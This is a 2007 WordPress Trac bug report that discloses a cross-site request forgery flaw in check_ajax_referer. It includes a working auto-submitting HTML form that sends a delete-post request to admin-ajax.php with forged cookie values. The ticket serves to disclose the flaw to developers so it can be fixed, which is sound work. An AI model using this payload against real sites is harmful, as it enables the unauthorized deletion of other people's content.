[wp-trac] [WordPress Trac] #4939: check_ajax_referer does not
protect from CSRF at all
WordPress Trac
wp-trac at lists.automattic.com
Sun Sep 9 01:05:28 GMT 2007
#4939: check_ajax_referer does not protect from CSRF at all
----------------------+-----------------------------------------------------
Reporter: xknown | Owner: anonymous
Type: defect | Status: new
Priority: normal | Milestone:
Component: Security | Version: 2.3
Severity: normal | Keywords:
----------------------+-----------------------------------------------------
`check_ajax_referer` only checks if the incoming request contains valid
user credentials but `wp_get_current_user` still uses WP cookies to
determine the current user, so anyone with a subscriber role (or another
role) can perform CSRF attacks.
{{{
<html>
<body>
<form method="post" action="http://localhost/wp/wp-admin/admin-
ajax.php">
<input type="text" name="action" value="delete-post" />
<input type="text" name="id" value="Post_ID" />
<input type="text" name="cookie"
value="wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password"
/>
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
}}}
--
Ticket URL: <http://trac.wordpress.org/ticket/4939>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list